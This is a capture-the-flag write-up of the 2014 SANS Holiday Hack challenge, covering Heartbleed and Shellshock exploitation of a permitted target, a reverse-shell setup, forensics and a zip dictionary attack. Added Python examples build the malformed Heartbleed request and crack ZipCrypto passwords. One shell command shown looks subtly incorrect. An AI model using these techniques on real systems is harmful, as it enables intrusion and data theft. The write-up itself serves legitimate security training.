2014 SANS Holiday Hacking Carol Challenge

Every year, the SANS institute hosts a holiday hacking challenge open to any and all that want to participate. This year I decided to hop on board after @n3tl0kr from our #MISEC crew sent out the following tweet:

In this year’s challenge, you’ll get to match wits with an Artificially Intelligent agent, exploit a target machine, and do some detailed packet capture and file analysis, all with the goal of unraveling the mysteries of the Ghosts of Hacking Past, Present, and Future to save old Ebenezer Scrooge from certain doom.

I was hooked…

The Task

Scrooge has been transformed by the secrets revealed by the visiting specters. But how? Analyze the evidence provided in our tale, and answer the following questions:

What secret did the Ghost of Hacking Past include on the system at 173.255.233.59?

What two secrets did the Ghost of Hacking Present deposit on the http://www.scrooge-and-marley.com website? You have permission to attack that website (TCP port 80 and 443 only) with the goal of retrieving those secrets, but please do not attempt any denial of service attacks or performance hogging attacks on that machine.

What four secrets are found on the USB file system image bestowed by the Ghost of Hacking Future?

Question 1: What secret did the Ghost of Hacking Past include on the system at 173.255.233.59?

Because the ghost of Mr. Alan Turing was generous enough to provide a target IP address, I was able to dive right into the scanning phase of my ethical hacking process. First I needed to find out whether an active machine lived at this address at all.

I first pinged the target, 173.255.233.59, and it responded.

The replies came back with a Time to Live (TTL) of 52, which suggested a Linux/Unix kernel roughly 12 hops away (Linux sets an initial TTL of 64 and every router on the path decrements it by one). This is only a heuristic: the initial TTL is tunable, and other systems start from different defaults (Windows uses 128), so it is a first guess to be confirmed by fingerprinting rather than a conclusion.

At this point I moved on to port scanning, where I unfortunately spent a significant amount of time chasing a dead end. A default scan showed only port 22 (SSH) open, and its banner and service fingerprint gave me nothing useful, so I started adjusting my Nmap parameters. A stealthy SYN scan of all 65535 ports (nmap -sS -p-) finally turned up an open high port, 31124, that the default port list had missed.

I did not know what runs on this port, so I did what any curious hacker would do and used telnet to connect (what’s the worst that can happen?). And this is where I met dearest ELIZA.

A little research told me that ELIZA was an early conversational program (Joseph Weizenbaum’s, from the 1960s) that is often discussed alongside Alan Turing’s “Turing Test”. ELIZA gives human-like answers by picking keywords out of the user’s input and replying with canned responses. But what secrets did she possess? I spent a good while getting to know ELIZA, asking questions and studying her responses, and after going back to the story I spotted a hint:

“Feel free to connect with her, surf the Internet together, and see if you can discover her secret.”

After countless commands without getting anything back I was able to get a response that was different. I typed

and was given back the HTML page title along with the question “does this look accurate?” I tried this with various websites and kept getting the same kind of console response, which on its own was not helpful. But what was happening on the server side? What request was ELIZA sending out, and what was being relayed back into her console output? Luckily I have a publicly accessible web server (the one you’re reading!), so I asked ELIZA to browse to it, where I could watch her request arrive on my side.
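The trick described above (point the bot at a server you control and read back exactly what it sends) is easy to reproduce locally. The block below is an added example, not code from the original post: it starts a minimal HTTP server on 127.0.0.1 that records the request line and every header it receives, and `capture_one` plays the part of the remote fetcher. The port, the page served and the simulated client’s User-Agent string are assumptions; nothing here contacts the challenge host.

```python
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


class CaptureHandler(BaseHTTPRequestHandler):
    """Record every request instead of serving real content."""
    captured = []  # one dict per request, shared across handler instances

    def do_GET(self):
        CaptureHandler.captured.append({
            "client": self.client_address[0],
            "method": self.command,
            "path": self.path,
            "headers": {k.lower(): v for k, v in self.headers.items()},
        })
        body = b"<html><head><title>captured</title></head><body>ok</body></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):
        pass  # keep stderr quiet; the record lives in `captured`


def start_capture_server(port=0):
    """Serve on a background thread; port 0 lets the OS pick a free port (read it from server_address)."""
    server = HTTPServer(("127.0.0.1", port), CaptureHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def capture_one(server, user_agent):
    """Stand-in for the remote fetcher (constructed client): one GET against the capture server
    with a chosen User-Agent. Proxies are disabled so the request really goes to 127.0.0.1."""
    url = "http://127.0.0.1:%d/" % server.server_address[1]
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with opener.open(req, timeout=5) as resp:
        resp.read()
    return CaptureHandler.captured[-1]


if __name__ == "__main__":
    srv = start_capture_server()
    rec = capture_one(srv, "ConstructedBot/1.0 (stand-in for a remote fetcher)")
    print(rec["method"], rec["path"], "User-Agent:", rec["headers"].get("user-agent"))
    srv.shutdown()
```

Against a real fetcher you would leave `start_capture_server` running on a reachable port and read `CaptureHandler.captured` after the bot has visited; the User-Agent and any unusual headers are the first things worth looking at.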

Question 2: What two secrets did the Ghost of Hacking Present deposit on the http://www.scrooge-and-marley.com website?

Again, it is always nice to have a target to start with. I did not need to do much port scanning, since the instructions limited attacks to ports 80 and 443 and ruled out denial of service (which would be pointless for this challenge anyway). I did ping the server and got an immediate response from 23.239.15.124 with a TTL of 52, so again my first assumption was a Linux/Unix kernel.

I visited the site and downloaded a copy to work offline. Reading through the source, I noticed a link to a contact page that submits to a script called submit.sh. Running the submit form only brought me back to the home page of http://scrooge-and-marley.com. A shell script reachable from the web is worth remembering, though: it means the server hands web requests to Bash through a CGI handler.

Now to scan for vulnerabilities. Since my own tools are not enterprise grade and are licensed to scan private IPs only, I had to rely on third-party online scanners. I started with Heartbleed, because after reading the following hint I could only assume the server was vulnerable to both Shellshock and Heartbleed:

“To help you understand, I’ve magically introduced two special secrets on your very own company website, www.scrooge-and-marley.com. Those secrets should shock your heart, teaching you important lessons for all time.”

I used an online Heartbleed scanning tool against http://scrooge-and-marley.com and, sure enough, the result came back positive for this OpenSSL vulnerability (CVE-2014-0160).

I needed an exploit, so I downloaded a verified Heartbleed Python script from a well-known site and started to plan my attack. I loaded up Kali in a VM and set the script to loop over and over: each response returns an unpredictable slice of the server’s process memory (Heartbleed is a buffer over-read in OpenSSL’s heartbeat handling, not an overflow), so I wanted to run the exploit for a period of time and collect as much data as possible.
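To make the over-read concrete, here is an added example (not the script the post used, and with no network code) that builds the malformed heartbeat record behind CVE-2014-0160, parses the records a server returns, and models the repeat-and-dedupe loop described above. The request has the same shape as the public proof of concept: a heartbeat whose payload_length field claims 0x4000 bytes while the record carries none, so an unpatched OpenSSL copies that many bytes from its own heap into the reply. The server responses below are constructed to show the parsing; the “leaked” strings in them are made up.

```python
import re
import struct

TLS_HEARTBEAT = 0x18
HB_REQUEST, HB_RESPONSE = 1, 2


def build_heartbeat_request(claimed_len=0x4000, version=(3, 2)):
    """TLS record: type(1) version(2) length(2) | heartbeat: type(1) payload_length(2) payload padding.
    A well-formed request carries `claimed_len` payload bytes; this one carries none, which is the bug."""
    hb = struct.pack("!BH", HB_REQUEST, claimed_len)
    return struct.pack("!BBBH", TLS_HEARTBEAT, version[0], version[1], len(hb)) + hb


def parse_tls_records(data):
    """Split a byte stream into (content_type, version, body) tuples; stop at a truncated record."""
    records, off = [], 0
    while off + 5 <= len(data):
        ctype, vmaj, vmin, length = struct.unpack("!BBBH", data[off:off + 5])
        body = data[off + 5:off + 5 + length]
        if len(body) < length:
            break
        records.append((ctype, (vmaj, vmin), body))
        off += 5 + length
    return records


def heartbeat_leak(data, sent_payload_len=0):
    """Bytes the heartbeat response carries beyond what the request legitimately supplied.
    The server echoes payload_length as declared, so everything past our own payload is server memory."""
    for ctype, _version, body in parse_tls_records(data):
        if ctype == TLS_HEARTBEAT and body[:1] == bytes([HB_RESPONSE]):
            plen = struct.unpack("!H", body[1:3])[0]
            return body[3:3 + plen][sent_payload_len:]
    return b""


def printable_strings(blob, min_len=6):
    """Same idea as strings(1): runs of printable ASCII at least min_len long."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def collect_leak(responses, min_len=6):
    """The loop from the post: each leak is a random heap snapshot, so keep the union over many tries."""
    seen = []
    for resp in responses:
        for s in printable_strings(heartbeat_leak(resp), min_len):
            if s not in seen:
                seen.append(s)
    return seen


def fake_heartbeat_response(leaked):
    """Constructed stand-in for an unpatched server's reply: response type, declared length, leaked
    heap bytes, then the padding a real heartbeat carries."""
    hb = struct.pack("!BH", HB_RESPONSE, len(leaked)) + leaked + b"\x00" * 16
    return struct.pack("!BBBH", TLS_HEARTBEAT, 3, 2, len(hb)) + hb


if __name__ == "__main__":
    print(build_heartbeat_request().hex())  # the famous 8-byte record
    replies = [fake_heartbeat_response(b"\x00\x02Cookie: session=constructed123\x00"),
               fake_heartbeat_response(b"\xff\x10user=example&pass=notreal\x00")]
    print(collect_leak(replies))
```

In a live run the request goes out after a normal ClientHello/ServerHello exchange, and `heartbeat_leak` is applied to each reply; the patched server either drops the malformed heartbeat or answers with an empty payload, so an empty result from `collect_leak` after many iterations is the negative signal.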

Because submit.sh runs as a CGI script, the web server exports the request headers to it as environment variables, so the value of the Cookie header arrives in HTTP_COOKIE. When the vulnerable Bash started up it parsed that variable as a function definition and executed the command trailing it, and the output appeared in the response HTML page, meaning the server was vulnerable to Shellshock (CVE-2014-6271). I needed an exploit, so I downloaded a verified Shellshock PHP script from a well-known site and started to plan my attack. Since I wanted a reverse shell, I had to make sure I had a machine reachable from the Internet. A little port-forwarding magic on my router for port 6969 to my Kali VM’s IP address, tied in with the command below to start my listener, and I was ready to go.

Running the exploit immediately produced a shell prompt and I *thought* I was done. Only a few commands such as echo and pwd would work, and I could not even list the contents of the directory I was in! The pattern is telling: echo and pwd are Bash builtins, while ls and cat are external programs, so the shell itself ran but could not find (or was not permitted to run) anything outside itself. I honestly spent the most time on this secret, since I had the least experience with native POSIX. After intense research and some collaboration with a Linux admin, I was able to list the current directory by letting the shell expand the * glob itself, typing

echo "%s\n" *

I then changed directory to the root folder and listed its contents the same way, and found a file called secret. Now the second-hardest part was to display the file on the console: none of my usual commands would work, so I reached back out to my Linux guru for advice. I knew echo worked, but how do you echo the contents of a file to the console? After many hours and endless variations of syntax, the command below finally worked and unveiled the secret!

Question 3: What four secrets are found on the USB File system image bestowed by the Ghost of Hacking Future?

When I first downloaded the hhusb.dd.bin USB image I wanted to ensure that none of its contents would be modified, as could happen by simply extracting them with an archiving tool like 7-Zip. Instead I used Autopsy, a free forensics tool for Windows, which can analyze the image without altering it. I created a new case, imported the .bin file as a disk image, and I was on my way.

Autopsy sorted the image’s contents by file type and flagged that the image contained encrypted files. It also showed a deleted file, which could be interesting.

I started with the Office document “LetterFromJacktoChuck.doc” and read its contents. Though interesting in nature, the text itself held no secret. Digging further into the document’s metadata, I found USB Secret #1 in the “Custom” properties.

USB Secret #1: Your demise is a source of mirth.

Next I wanted to see what was in the Hh2014-schat.pcapng file. I opened it in Wireshark and started looking for interesting items, beginning with all HTTP POST requests, and by following the TCP streams of the interesting packets I uncovered a conversation.

Looking at each POST, right-clicking and following the TCP stream, I was able to piece the conversation together:

{"id":"2050686064.4648.7a3afc70717ab3.80889290","sender":"2a368e544111c18030856a46320200e68ad8a263","recipient":"channel|xxx","type":"msg","body":"My Darling Husband, I do so appreciate your checking with Mr. Scrooge about the status of our debts. If he would grant us just one more month, we may be able scrape together enough to meet him minimum payment and stay out of debtor’s prison. Please tell me of your progress, my love.","timestamp":2050686064}

{"id":"2050686089.2728.7a3afc89429941.79812946","sender":"d5c1bc63db3b1c59cc312503433470270e146e24","recipient":"channel|xxx","type":"msg","body":"As promised, I have indeed reached out to Mr. Scrooge to discuss our financial affairs with him, dear.","timestamp":2050686089}

{"id":"2050686101.3766.7a3afc955bf246.40975752","sender":"2a368e544111c18030856a46320200e68ad8a263","recipient":"channel|xxx","type":"msg","body":"Is it good… or bad?","timestamp":2050686101}

{"id":"2050686139.2382.7a3afcbb3a2774.07852556","sender":"d5c1bc63db3b1c59cc312503433470270e146e24","recipient":"channel|xxx","type":"msg","body":"No. There is hope yet, Caroline.","timestamp":2050686139}

{"id":"2050686166.3458.7a3afcd6546eb7.19699057","sender":"2a368e544111c18030856a46320200e68ad8a263","recipient":"channel|xxx","type":"msg","body":"If he relents, there is. Nothing is past hope, if such a miracle has happened.","timestamp":2050686166}

{"id":"2050686180.628.7a3afce4995195.67896075","sender":"d5c1bc63db3b1c59cc312503433470270e146e24","recipient":"channel|xxx","type":"msg","body":"He is past relenting. He is dead.","timestamp":2050686180}

{"id":"2050686208.1888.7a3afd002e16a8.60198759","sender":"2a368e544111c18030856a46320200e68ad8a263","recipient":"channel|xxx","type":"msg","body":"That is wondrous news! To whom will our debt be transferred?","timestamp":2050686208}

{"id":"2050686258.0418.7a3afd320a3816.89103764","sender":"d5c1bc63db3b1c59cc312503433470270e146e24","recipient":"channel|xxx","type":"msg","body":"I don’t know. But before that time we shall be ready with the money. And even if we are not, it would be a bad fortune indeed to find so merciless a creditor in his successor. We may sleep tonight with light hearts, Caroline!","timestamp":2050686258}

{"id":"2050686293.3549.7a3afd5556a476.91742867","sender":"2a368e544111c18030856a46320200e68ad8a263","recipient":"channel|xxx","type":"msg","body":"I’ve just told our children about Mr. Scrooge’s death, and all of their faces are brighter for it. We now have a very happy house. I so love you.","timestamp":2050686293}

Unfortunately the address of chat.scrooge-and-marley.com was not active so I was not able to go any further with this.

By this point I had some display filters saved and wanted to write the filtered packets out as a new file. When I chose pcap as the format, Wireshark warned that the file contained comments that would be lost and asked whether I really wanted to save as pcap instead of pcapng.

I knew I had not added any comments to the capture, so I went looking for the ones that were already there. Scrolling through, I reached packet #2000, which carried a packet comment that looked like base64. Echoing the string in the console and piping it through base64 -d, I discovered USB Secret #2!

USB Secret #2: Your demise is a source of relief.

I did find something else in the Wireshark packet capture that I will get to for USB Secret #4, but first…

I wanted to look into that encrypted file. I could list the zip’s contents but not extract them: it held a single picture, Bed_Curtains.png, and the entry was password protected. (This is normal for zip archives: file names and sizes are stored in the clear even when the data is encrypted, which is why the name was visible.)

I tried guessing a few passwords without any luck, so I decided to run a dictionary attack against it in Kali Linux. I keep a directory of word lists for this purpose, and I looped through each of them with fcrackzip. The attack succeeded: the word “shambolic” from rockyou.txt turned out to be the password for the zip!
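The same attack in a form that runs offline, as an added example rather than the post’s fcrackzip run. Because Python’s zipfile module can read but not write password-protected entries, the block also carries a small writer for traditional PKWARE “ZipCrypto” encryption (the scheme fcrackzip targets) so a sample archive can be built in memory. The attack itself uses only the standard library reader, which rejects a wrong password either at the 12-byte check header or, for the roughly 1 in 256 wrong passwords that slip past it, at the final CRC check. The file name, password and word lists below are constructed.

```python
import io
import struct
import zipfile
import zlib

_CRC_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _CRC_TABLE.append(_c)


def _crc32_step(crc, byte):
    return _CRC_TABLE[(crc ^ byte) & 0xFF] ^ (crc >> 8)


class ZipCrypto:
    """PKWARE traditional encryption keystream (APPNOTE 6.1): three 32-bit keys seeded by the password
    and then driven by every plaintext byte. The state is tiny and the check byte leaks one byte of
    verification per guess, which is why dictionary attacks on it are cheap."""
    def __init__(self, password):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:
            self._update(b)

    def _update(self, b):
        self.k0 = _crc32_step(self.k0, b)
        self.k1 = ((self.k1 + (self.k0 & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc32_step(self.k2, self.k1 >> 24)

    def encrypt(self, plaintext):
        out = bytearray()
        for b in plaintext:
            t = self.k2 | 2
            out.append(b ^ (((t * (t ^ 1)) >> 8) & 0xFF))
            self._update(b)
        return bytes(out)


def build_encrypted_zip(name, data, password):
    """One stored (uncompressed) entry with flag bit 0 set. The 12-byte encryption header precedes
    the data; its last byte mirrors the high byte of the CRC so readers can reject most wrong passwords
    before touching the data. Header filler is fixed here; real writers use random bytes."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    blob = ZipCrypto(password).encrypt(bytes([0x5A] * 11) + bytes([crc >> 24]) + data)
    fname = name.encode()
    dostime, dosdate = 0, ((2014 - 1980) << 9) | (12 << 5) | 25
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, 1, 0, dostime, dosdate,
                        crc, len(blob), len(data), len(fname), 0) + fname
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, 1, 0, dostime, dosdate,
                          crc, len(blob), len(data), len(fname), 0, 0, 0, 0, 0, 0) + fname
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1, len(central), len(local + blob), 0)
    return local + blob + central + eocd


def read_member(zip_bytes, member, password):
    """Decrypt and return one member; raises on a wrong password."""
    return zipfile.ZipFile(io.BytesIO(zip_bytes)).read(member, pwd=password.encode())


def dictionary_attack(zip_bytes, member, wordlists):
    """Try every candidate from every word list in order; return (password, attempts) or (None, attempts)."""
    zf = zipfile.ZipFile(io.BytesIO(zip_bytes))
    tried = 0
    for words in wordlists:
        for word in words:
            tried += 1
            try:
                zf.read(member, pwd=word.encode())
                return word, tried
            except (RuntimeError, zipfile.BadZipFile, zlib.error):
                continue  # check-byte mismatch, CRC mismatch, or garbage data
    return None, tried


def sample_archive():
    """Constructed archive: placeholder bytes named like the post's picture, locked with 'shambolic'."""
    fake_png = b"\x89PNG\r\n\x1a\n" + b"constructed image payload, not a real picture"
    return build_encrypted_zip("Bed_Curtains.png", fake_png, b"shambolic")


WORDLISTS = [["password", "123456", "scrooge", "marley"], ["humbug", "shambolic", "tinytim"]]  # constructed

if __name__ == "__main__":
    print(dictionary_attack(sample_archive(), "Bed_Curtains.png", WORDLISTS))
```

With a real word list, replace `WORDLISTS` with `[open("rockyou.txt", errors="ignore").read().splitlines()]`; the per-guess cost is dominated by the 12-byte header check, which is why fcrackzip gets through rockyou.txt quickly, and why AES-encrypted zips (which Python’s reader cannot open at all) are the right choice when the archive actually matters.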

I initially suspected steganography, but I wanted to check the picture in Autopsy first, and looking through the strings it extracted from the file revealed the secret hidden within.

On the 88th page of the extracted strings was the Secret #3!

USB Secret #3: Your demise is a source of gain for others.

I mentioned in the process of analyzing the capture file that I found another clue. I love to use PowerShell when possible and decided to write up a quick command that will parse a capture file and extract all unique URLs found.
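This is an added example serving two steps above (not the post’s PowerShell one-liner): a standard-library reader for the pcapng block layout that pulls out the per-packet comments Wireshark warned would be lost on save-as-pcap, decoding any that are base64 as USB Secret #2 was, and that lists every distinct URL requested in the HTTP traffic. The block types, option codes and field order follow the pcapng specification; the small writer exists only to construct a sample capture in memory, and the packets in it (dummy 54-byte link/IP/TCP headers in front of the HTTP text) are constructed.

```python
import base64
import re
import struct

SHB, IDB, EPB = 0x0A0D0D0A, 0x00000001, 0x00000006  # block types (pcapng spec)
OPT_END, OPT_COMMENT = 0, 1                           # option codes
REQUEST_LINE = re.compile(rb"(?:GET|POST) (/\S*) HTTP/1\.[01]\r\n")
HOST_HEADER = re.compile(rb"^Host: ([^\r\n]+)\r\n", re.M)


def _pad4(n):
    return (4 - n % 4) % 4


def _block(btype, body):
    """type, total length, body padded to 32 bits, total length again."""
    total = 12 + len(body) + _pad4(len(body))
    return struct.pack("<II", btype, total) + body + b"\x00" * _pad4(len(body)) + struct.pack("<I", total)


def _option(code, value):
    return struct.pack("<HH", code, len(value)) + value + b"\x00" * _pad4(len(value))


def build_sample_pcapng(packets):
    """Writer for test data only: little-endian section, one Ethernet interface, one Enhanced Packet
    Block per (bytes, comment_or_None) pair."""
    out = _block(SHB, struct.pack("<IHHq", 0x1A2B3C4D, 1, 0, -1) + _option(OPT_END, b""))
    out += _block(IDB, struct.pack("<HHI", 1, 0, 65535) + _option(OPT_END, b""))
    for i, (data, comment) in enumerate(packets):
        body = struct.pack("<IIIII", 0, 0, i + 1, len(data), len(data)) + data + b"\x00" * _pad4(len(data))
        if comment is not None:
            body += _option(OPT_COMMENT, comment)
        out += _block(EPB, body + _option(OPT_END, b""))
    return out


def iter_blocks(data):
    """Yield (byte_order, block_type, body); the Section Header's magic fixes the byte order."""
    fmt, off = "<", 0
    while off + 12 <= len(data):
        btype = struct.unpack_from(fmt + "I", data, off)[0]
        if btype == SHB:
            fmt = "<" if data[off + 8:off + 12] == b"\x4d\x3c\x2b\x1a" else ">"
        total = struct.unpack_from(fmt + "I", data, off + 4)[0]
        if total < 12 or off + total > len(data):
            break  # truncated file: stop rather than misparse
        yield fmt, btype, data[off + 8:off + total - 4]
        off += total


def _options(fmt, blob):
    opts, off = [], 0
    while off + 4 <= len(blob):
        code, length = struct.unpack_from(fmt + "HH", blob, off)
        if code == OPT_END:
            break
        opts.append((code, blob[off + 4:off + 4 + length]))
        off += 4 + length + _pad4(length)
    return opts


def packets_with_comments(data):
    """[(packet_number, packet_bytes, [comment, ...])] for each Enhanced Packet Block, in file order."""
    result = []
    for fmt, btype, body in iter_blocks(data):
        if btype != EPB:
            continue
        caplen = struct.unpack_from(fmt + "IIIII", body, 0)[3]  # iface, ts_hi, ts_lo, caplen, origlen
        opts = _options(fmt, body[20 + caplen + _pad4(caplen):])
        comments = [v.decode("utf-8", "replace") for c, v in opts if c == OPT_COMMENT]
        result.append((len(result) + 1, body[20:20 + caplen], comments))
    return result


def decoded_comments(data):
    """Packet comments as (packet_number, text), base64-decoded where the comment is valid base64."""
    found = []
    for number, _pkt, comments in packets_with_comments(data):
        for c in comments:
            try:
                text = base64.b64decode(c, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                text = c
            found.append((number, text))
    return found


def unique_urls(data):
    """Every distinct http://host/path requested, scanning raw packet bytes for an HTTP request line."""
    urls = []
    for _n, pkt, _c in packets_with_comments(data):
        req, host = REQUEST_LINE.search(pkt), HOST_HEADER.search(pkt)
        if req and host:
            url = "http://%s%s" % (host.group(1).decode(), req.group(1).decode())
            if url not in urls:
                urls.append(url)
    return urls


def sample_capture():
    """Constructed: three HTTP requests, the second carrying a base64 packet comment (the post's secret #2)."""
    def req(host, path):
        return b"\x00" * 54 + b"GET " + path + b" HTTP/1.1\r\nHost: " + host + b"\r\nUser-Agent: constructed\r\n\r\n"
    return build_sample_pcapng([
        (req(b"www.scrooge-and-marley.com", b"/"), None),
        (req(b"chat.scrooge-and-marley.com", b"/chat/"), base64.b64encode(b"Your demise is a source of relief.")),
        (req(b"www.scrooge-and-marley.com", b"/"), b"plain text comment, not base64"),
    ])
```

Run it on a real file with `decoded_comments(open("Hh2014-schat.pcapng", "rb").read())`; packet numbers match Wireshark’s so a hit can be cross-checked there. `unique_urls` deliberately ignores TCP reassembly, so a request split across segments is missed; for that case Wireshark’s own HTTP dissector (or a reassembling library) is the right tool, and the point of the regex pass is a quick first look, not a full parser.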

The clue led to a steganography tool that uses the F5 algorithm to hide data in JPEG images. I remembered the picture Autopsy had found in the [DELETED] directory; maybe there was a secret within?

I downloaded the tool to my Kali box and ran the command syntax and what do you know! I found USB Secret #4!

USB Secret #4: You can prevent much grief and cause much joy. Hack for good, not evil or greed.

Through this challenge I have not only sharpened existing skills but learned many new ones to add to my forensics tool belt. Although this write-up makes it look as if I had the right answer to every question, it really took a LOT of wrong guesses and dead ends before each answer was unveiled. I also realized I should document more DURING the exploit so I don’t have to go back for screencaps afterwards 🙂

Otherwise, I was very happy to complete this successfully and look forward to next year’s challenge!

All Secrets:

Eliza Secret: “Machines take me by surprise with great frequency. –Alan Turing”

Website Secret #1: Hacking can be noble

Website Secret #2: Use your skills for good.

USB Secret #1: Your demise is a source of mirth.

USB Secret #2: Your demise is a source of relief.

USB Secret #3: Your demise is a source of gain for others.

USB Secret #4: You can prevent much grief and cause much joy. Hack for good, not evil or greed.